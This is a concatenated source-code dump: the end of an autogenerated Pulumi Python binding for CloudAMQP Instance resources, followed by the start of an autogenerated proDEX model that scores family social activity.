"""
The subscription plan. See available plans
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: pulumi.Input[str]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter
def region(self) -> pulumi.Input[str]:
"""
The region to host the instance in. See Instance regions
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: pulumi.Input[str]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the CloudAMQP instance.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="noDefaultAlarms")
def no_default_alarms(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
"""
return pulumi.get(self, "no_default_alarms")
@no_default_alarms.setter
def no_default_alarms(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_default_alarms", value)
@property
@pulumi.getter
def nodes(self) -> Optional[pulumi.Input[int]]:
"""
Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
"""
return pulumi.get(self, "nodes")
@nodes.setter
def nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "nodes", value)
@property
@pulumi.getter(name="rmqVersion")
def rmq_version(self) -> Optional[pulumi.Input[str]]:
"""
The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
"""
return pulumi.get(self, "rmq_version")
@rmq_version.setter
def rmq_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rmq_version", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="vpcSubnet")
def vpc_subnet(self) -> Optional[pulumi.Input[str]]:
"""
Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
return pulumi.get(self, "vpc_subnet")
@vpc_subnet.setter
def vpc_subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_subnet", value)
@pulumi.input_type
class _InstanceState:
def __init__(__self__, *,
apikey: Optional[pulumi.Input[str]] = None,
dedicated: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
no_default_alarms: Optional[pulumi.Input[bool]] = None,
nodes: Optional[pulumi.Input[int]] = None,
plan: Optional[pulumi.Input[str]] = None,
ready: Optional[pulumi.Input[bool]] = None,
region: Optional[pulumi.Input[str]] = None,
rmq_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None,
vhost: Optional[pulumi.Input[str]] = None,
vpc_subnet: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Instance resources.
:param pulumi.Input[str] apikey: API key needed to communicate to CloudAMQP's second API. The second API is used to manage alarms, integration and more, full description [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
:param pulumi.Input[bool] dedicated: Is the instance hosted on a dedicated server
:param pulumi.Input[str] host: The host name for the CloudAMQP instance.
:param pulumi.Input[str] name: Name of the CloudAMQP instance.
:param pulumi.Input[bool] no_default_alarms: Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
:param pulumi.Input[int] nodes: Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
:param pulumi.Input[str] plan: The subscription plan. See available plans
:param pulumi.Input[bool] ready: Flag describing if the resource is ready
:param pulumi.Input[str] region: The region to host the instance in. See Instance regions
:param pulumi.Input[str] rmq_version: The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
:param pulumi.Input[str] url: AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
:param pulumi.Input[str] vhost: The virtual host used by Rabbit MQ.
:param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
if apikey is not None:
pulumi.set(__self__, "apikey", apikey)
if dedicated is not None:
pulumi.set(__self__, "dedicated", dedicated)
if host is not None:
pulumi.set(__self__, "host", host)
if name is not None:
pulumi.set(__self__, "name", name)
if no_default_alarms is not None:
pulumi.set(__self__, "no_default_alarms", no_default_alarms)
if nodes is not None:
pulumi.set(__self__, "nodes", nodes)
if plan is not None:
pulumi.set(__self__, "plan", plan)
if ready is not None:
pulumi.set(__self__, "ready", ready)
if region is not None:
pulumi.set(__self__, "region", region)
if rmq_version is not None:
pulumi.set(__self__, "rmq_version", rmq_version)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if url is not None:
pulumi.set(__self__, "url", url)
if vhost is not None:
pulumi.set(__self__, "vhost", vhost)
if vpc_subnet is not None:
pulumi.set(__self__, "vpc_subnet", vpc_subnet)
@property
@pulumi.getter
def apikey(self) -> Optional[pulumi.Input[str]]:
"""
API key needed to communicate to CloudAMQP's second API. The second API is used to manage alarms, integration and more, full description [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
"""
return pulumi.get(self, "apikey")
@apikey.setter
def apikey(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "apikey", value)
@property
@pulumi.getter
def dedicated(self) -> Optional[pulumi.Input[bool]]:
"""
Is the instance hosted on a dedicated server
"""
return pulumi.get(self, "dedicated")
@dedicated.setter
def dedicated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "dedicated", value)
@property
@pulumi.getter
def host(self) -> Optional[pulumi.Input[str]]:
"""
The host name for the CloudAMQP instance.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the CloudAMQP instance.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="noDefaultAlarms")
def no_default_alarms(self) -> Optional[pulumi.Input[bool]]:
"""
Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
"""
return pulumi.get(self, "no_default_alarms")
@no_default_alarms.setter
def no_default_alarms(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "no_default_alarms", value)
@property
@pulumi.getter
def nodes(self) -> Optional[pulumi.Input[int]]:
"""
Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
"""
return pulumi.get(self, "nodes")
@nodes.setter
def nodes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "nodes", value)
@property
@pulumi.getter
def plan(self) -> Optional[pulumi.Input[str]]:
"""
The subscription plan. See available plans
"""
return pulumi.get(self, "plan")
@plan.setter
def plan(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "plan", value)
@property
@pulumi.getter
def ready(self) -> Optional[pulumi.Input[bool]]:
"""
Flag describing if the resource is ready
"""
return pulumi.get(self, "ready")
@ready.setter
def ready(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ready", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The region to host the instance in. See Instance regions
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="rmqVersion")
def rmq_version(self) -> Optional[pulumi.Input[str]]:
"""
The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
"""
return pulumi.get(self, "rmq_version")
@rmq_version.setter
def rmq_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rmq_version", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def url(self) -> Optional[pulumi.Input[str]]:
"""
AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def vhost(self) -> Optional[pulumi.Input[str]]:
"""
The virtual host used by Rabbit MQ.
"""
return pulumi.get(self, "vhost")
@vhost.setter
def vhost(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vhost", value)
@property
@pulumi.getter(name="vpcSubnet")
def vpc_subnet(self) -> Optional[pulumi.Input[str]]:
"""
Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
return pulumi.get(self, "vpc_subnet")
@vpc_subnet.setter
def vpc_subnet(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "vpc_subnet", value)
class Instance(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
no_default_alarms: Optional[pulumi.Input[bool]] = None,
nodes: Optional[pulumi.Input[int]] = None,
plan: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
rmq_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
vpc_subnet: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource allows you to create and manage a CloudAMQP instance running Rabbit MQ and deploy to multiple cloud platforms provider and over multiple regions, see Instance regions for more information.
Once the instance is created it will be assigned a unique identifier. All other resource and data sources created for this instance needs to reference the instance identifier.
## Example Usage
```python
import pulumi
import pulumi_cloudamqp as cloudamqp
# Minimum free lemur instance
lemur_instance = cloudamqp.Instance("lemurInstance",
plan="lemur",
region="amazon-web-services::us-west-1")
# New dedicated bunny instance
instance = cloudamqp.Instance("instance",
no_default_alarms=True,
nodes=1,
plan="bunny-1",
region="amazon-web-services::us-west-1",
rmq_version="3.8.3",
tags=["terraform"])
```
## Import
`cloudamqp_instance`can be imported using CloudAMQP internal identifier. To retrieve the identifier for an instance, use [CloudAMQP customer API](https://docs.cloudamqp.com/#list-instances).
```sh
$ pulumi import cloudamqp:index/instance:Instance instance <id>`
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Name of the CloudAMQP instance.
:param pulumi.Input[bool] no_default_alarms: Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
:param pulumi.Input[int] nodes: Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
:param pulumi.Input[str] plan: The subscription plan. See available plans
:param pulumi.Input[str] region: The region to host the instance in. See Instance regions
:param pulumi.Input[str] rmq_version: The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
:param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: InstanceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource allows you to create and manage a CloudAMQP instance running Rabbit MQ and deploy to multiple cloud platforms provider and over multiple regions, see Instance regions for more information.
Once the instance is created it will be assigned a unique identifier. All other resource and data sources created for this instance needs to reference the instance identifier.
## Example Usage
```python
import pulumi
import pulumi_cloudamqp as cloudamqp
# Minimum free lemur instance
lemur_instance = cloudamqp.Instance("lemurInstance",
plan="lemur",
region="amazon-web-services::us-west-1")
# New dedicated bunny instance
instance = cloudamqp.Instance("instance",
no_default_alarms=True,
nodes=1,
plan="bunny-1",
region="amazon-web-services::us-west-1",
rmq_version="3.8.3",
tags=["terraform"])
```
## Import
`cloudamqp_instance`can be imported using CloudAMQP internal identifier. To retrieve the identifier for an instance, use [CloudAMQP customer API](https://docs.cloudamqp.com/#list-instances).
```sh
$ pulumi import cloudamqp:index/instance:Instance instance <id>`
```
:param str resource_name: The name of the resource.
:param InstanceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(InstanceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
no_default_alarms: Optional[pulumi.Input[bool]] = None,
nodes: Optional[pulumi.Input[int]] = None,
plan: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
rmq_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
vpc_subnet: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = InstanceArgs.__new__(InstanceArgs)
__props__.__dict__["name"] = name
__props__.__dict__["no_default_alarms"] = no_default_alarms
__props__.__dict__["nodes"] = nodes
if plan is None and not opts.urn:
raise TypeError("Missing required property 'plan'")
__props__.__dict__["plan"] = plan
if region is None and not opts.urn:
raise TypeError("Missing required property 'region'")
__props__.__dict__["region"] = region
__props__.__dict__["rmq_version"] = rmq_version
__props__.__dict__["tags"] = tags
__props__.__dict__["vpc_subnet"] = vpc_subnet
__props__.__dict__["apikey"] = None
__props__.__dict__["dedicated"] = None
__props__.__dict__["host"] = None
__props__.__dict__["ready"] = None
__props__.__dict__["url"] = None
__props__.__dict__["vhost"] = None
super(Instance, __self__).__init__(
'cloudamqp:index/instance:Instance',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
apikey: Optional[pulumi.Input[str]] = None,
dedicated: Optional[pulumi.Input[bool]] = None,
host: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
no_default_alarms: Optional[pulumi.Input[bool]] = None,
nodes: Optional[pulumi.Input[int]] = None,
plan: Optional[pulumi.Input[str]] = None,
ready: Optional[pulumi.Input[bool]] = None,
region: Optional[pulumi.Input[str]] = None,
rmq_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
url: Optional[pulumi.Input[str]] = None,
vhost: Optional[pulumi.Input[str]] = None,
vpc_subnet: Optional[pulumi.Input[str]] = None) -> 'Instance':
"""
Get an existing Instance resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] apikey: API key needed to communicate to CloudAMQP's second API. The second API is used to manage alarms, integration and more, full description [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
:param pulumi.Input[bool] dedicated: Is the instance hosted on a dedicated server
:param pulumi.Input[str] host: The host name for the CloudAMQP instance.
:param pulumi.Input[str] name: Name of the CloudAMQP instance.
:param pulumi.Input[bool] no_default_alarms: Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
:param pulumi.Input[int] nodes: Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
:param pulumi.Input[str] plan: The subscription plan. See available plans
:param pulumi.Input[bool] ready: Flag describing if the resource is ready
:param pulumi.Input[str] region: The region to host the instance in. See Instance regions
:param pulumi.Input[str] rmq_version: The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
:param pulumi.Input[str] url: AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
:param pulumi.Input[str] vhost: The virtual host used by Rabbit MQ.
:param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InstanceState.__new__(_InstanceState)
__props__.__dict__["apikey"] = apikey
__props__.__dict__["dedicated"] = dedicated
__props__.__dict__["host"] = host
__props__.__dict__["name"] = name
__props__.__dict__["no_default_alarms"] = no_default_alarms
__props__.__dict__["nodes"] = nodes
__props__.__dict__["plan"] = plan
__props__.__dict__["ready"] = ready
__props__.__dict__["region"] = region
__props__.__dict__["rmq_version"] = rmq_version
__props__.__dict__["tags"] = tags
__props__.__dict__["url"] = url
__props__.__dict__["vhost"] = vhost
__props__.__dict__["vpc_subnet"] = vpc_subnet
return Instance(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def apikey(self) -> pulumi.Output[str]:
"""
API key needed to communicate to CloudAMQP's second API. The second API is used to manage alarms, integration and more, full description [CloudAMQP API](https://docs.cloudamqp.com/cloudamqp_api.html).
"""
return pulumi.get(self, "apikey")
@property
@pulumi.getter
def dedicated(self) -> pulumi.Output[bool]:
"""
Is the instance hosted on a dedicated server
"""
return pulumi.get(self, "dedicated")
@property
@pulumi.getter
def host(self) -> pulumi.Output[str]:
"""
The host name for the CloudAMQP instance.
"""
return pulumi.get(self, "host")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the CloudAMQP instance.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="noDefaultAlarms")
def no_default_alarms(self) -> pulumi.Output[bool]:
"""
Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
"""
return pulumi.get(self, "no_default_alarms")
@property
@pulumi.getter
def nodes(self) -> pulumi.Output[Optional[int]]:
"""
Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
"""
return pulumi.get(self, "nodes")
@property
@pulumi.getter
def plan(self) -> pulumi.Output[str]:
"""
The subscription plan. See available plans
"""
return pulumi.get(self, "plan")
@property
@pulumi.getter
def ready(self) -> pulumi.Output[bool]:
"""
Flag describing if the resource is ready
"""
return pulumi.get(self, "ready")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
The region to host the instance in. See Instance regions
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="rmqVersion")
def rmq_version(self) -> pulumi.Output[str]:
"""
The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
"""
return pulumi.get(self, "rmq_version")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def url(self) -> pulumi.Output[str]:
"""
AMQP server endpoint. `amqps://{username}:{password}@{hostname}/{vhost}`
"""
return pulumi.get(self, "url")
@property
@pulumi.getter
def vhost(self) -> pulumi.Output[str]:
"""
The virtual host used by Rabbit MQ.
"""
return pulumi.get(self, "vhost")
@property
@pulumi.getter(name="vpcSubnet")
def vpc_subnet(self) -> pulumi.Output[Optional[str]]:
"""
Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
return pulumi.get(self, "vpc_subnet")
| 45.601132 | 279 | 0.640043 | 4,097 | 32,240 | 4.890896 | 0.063217 | 0.086186 | 0.072662 | 0.060385 | 0.88936 | 0.873141 | 0.834265 | 0.823735 | 0.82119 | 0.802126 | 0 | 0.004114 | 0.253505 | 32,240 | 706 | 280 | 45.665722 | 0.828479 | 0.418362 | 0 | 0.699746 | 1 | 0 | 0.066243 | 0.00194 | 0 | 0 | 0 | 0 | 0 | 1 | 0.165394 | false | 0.002545 | 0.012723 | 0 | 0.279898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fd0600b8353e414fc31968043f51d0d27fbf8f12 | 22,203 | py | Python | pm/models/situ_social_activity_family.py | aosojnik/pipeline-manager-features-models | e5232f1c1b2073253a1c505dc9fff0d3d839dd6c | [
"MIT"
] | null | null | null | pm/models/situ_social_activity_family.py | aosojnik/pipeline-manager-features-models | e5232f1c1b2073253a1c505dc9fff0d3d839dd6c | [
"MIT"
] | null | null | null | pm/models/situ_social_activity_family.py | aosojnik/pipeline-manager-features-models | e5232f1c1b2073253a1c505dc9fff0d3d839dd6c | [
"MIT"
] | null | null | null | ##################################################################################
##########--this is an autogenerated python model definition for proDEX--#########
##--original file: Family_Assessment_v05_forprodex.dxi --##
##################################################################################
from .lib.proDEX import *
situ_social_activity_family = Node()
Relative_activity_Family = Node()
calls_last_7_days = Node()
visits_last_7_days = Node()
together_outside_last_7_days = Node()
Absolute_daily_activity_Family = Node()
feat_calls_count_family_relative = Atrib()
feat_calls_duration_family_relative = Atrib()
feat_visits_family_relative_past_week = Atrib()
feat_visits_family_relative = Atrib()
feat_outside_family_relative_past_week = Atrib()
feat_outside_family_relative = Atrib()
feat_calls_count_family_weekly_vs_goal = Atrib()
feat_visits_count_family_weekly_vs_goal = Atrib()
feat_outside_count_family_weekly_vs_goal = Atrib()
situ_social_activity_family.setName('situ_social_activity_family')
Relative_activity_Family.setName('Relative_activity_Family')
calls_last_7_days.setName('calls_last_7_days')
visits_last_7_days.setName('visits_last_7_days')
together_outside_last_7_days.setName('together_outside_last_7_days')
Absolute_daily_activity_Family.setName('Absolute_daily_activity_Family')
feat_calls_count_family_relative.setName('feat_calls_count_family_relative')
feat_calls_duration_family_relative.setName('feat_calls_duration_family_relative')
feat_visits_family_relative_past_week.setName('feat_visits_family_relative_past_week')
feat_visits_family_relative.setName('feat_visits_family_relative')
feat_outside_family_relative_past_week.setName('feat_outside_family_relative_past_week')
feat_outside_family_relative.setName('feat_outside_family_relative')
feat_calls_count_family_weekly_vs_goal.setName('feat_calls_count_family_weekly_vs_goal')
feat_visits_count_family_weekly_vs_goal.setName('feat_visits_count_family_weekly_vs_goal')
feat_outside_count_family_weekly_vs_goal.setName('feat_outside_count_family_weekly_vs_goal')
situ_social_activity_family.setValues(['very_low', 'low', 'medium', 'high', 'very_high'])
Relative_activity_Family.setValues(['high decrease', 'decrease', 'stable', 'increase', 'high increase'])
calls_last_7_days.setValues(['decrease', 'stable', 'increase'])
visits_last_7_days.setValues(['decrease', 'stable', 'increase'])
together_outside_last_7_days.setValues(['decrease', 'stable', 'increase'])
Absolute_daily_activity_Family.setValues(['very low', 'low', 'medium', 'high', 'very high'])
feat_calls_count_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_calls_duration_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_visits_family_relative_past_week.setValues(['decrease', 'stable', 'increase'])
feat_visits_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_outside_family_relative_past_week.setValues(['decrease', 'stable', 'increase'])
feat_outside_family_relative.setValues(['decrease', 'stable', 'increase'])
feat_calls_count_family_weekly_vs_goal.setValues(['low', 'medium', 'high'])
feat_visits_count_family_weekly_vs_goal.setValues(['low', 'medium', 'high'])
feat_outside_count_family_weekly_vs_goal.setValues(['low', 'medium', 'high'])
situ_social_activity_family.addChild(Relative_activity_Family)
Relative_activity_Family.setParent(situ_social_activity_family)
situ_social_activity_family.addChild(Absolute_daily_activity_Family)
Absolute_daily_activity_Family.setParent(situ_social_activity_family)
Relative_activity_Family.addChild(calls_last_7_days)
calls_last_7_days.setParent(Relative_activity_Family)
Relative_activity_Family.addChild(visits_last_7_days)
visits_last_7_days.setParent(Relative_activity_Family)
Relative_activity_Family.addChild(together_outside_last_7_days)
together_outside_last_7_days.setParent(Relative_activity_Family)
calls_last_7_days.addChild(feat_calls_count_family_relative)
feat_calls_count_family_relative.setParent(calls_last_7_days)
calls_last_7_days.addChild(feat_calls_duration_family_relative)
feat_calls_duration_family_relative.setParent(calls_last_7_days)
visits_last_7_days.addChild(feat_visits_family_relative_past_week)
feat_visits_family_relative_past_week.setParent(visits_last_7_days)
visits_last_7_days.addChild(feat_visits_family_relative)
feat_visits_family_relative.setParent(visits_last_7_days)
together_outside_last_7_days.addChild(feat_outside_family_relative_past_week)
feat_outside_family_relative_past_week.setParent(together_outside_last_7_days)
together_outside_last_7_days.addChild(feat_outside_family_relative)
feat_outside_family_relative.setParent(together_outside_last_7_days)
Absolute_daily_activity_Family.addChild(feat_calls_count_family_weekly_vs_goal)
feat_calls_count_family_weekly_vs_goal.setParent(Absolute_daily_activity_Family)
Absolute_daily_activity_Family.addChild(feat_visits_count_family_weekly_vs_goal)
feat_visits_count_family_weekly_vs_goal.setParent(Absolute_daily_activity_Family)
Absolute_daily_activity_Family.addChild(feat_outside_count_family_weekly_vs_goal)
feat_outside_count_family_weekly_vs_goal.setParent(Absolute_daily_activity_Family)
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'medium'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'high'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high decrease', Absolute_daily_activity_Family:'very high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'medium'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'decrease', Absolute_daily_activity_Family:'very high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'medium'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'stable', Absolute_daily_activity_Family:'very high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'very low'}, 'very_low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'medium'}, 'medium'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'high'}, 'high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'increase', Absolute_daily_activity_Family:'very high'}, 'very_high'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'very low'}, 'low'])
situ_social_activity_family.addFunctionRow([{Relative_activity_Family:'high increase', Absolute_daily_activity_Family:'low'}, 'medium'])
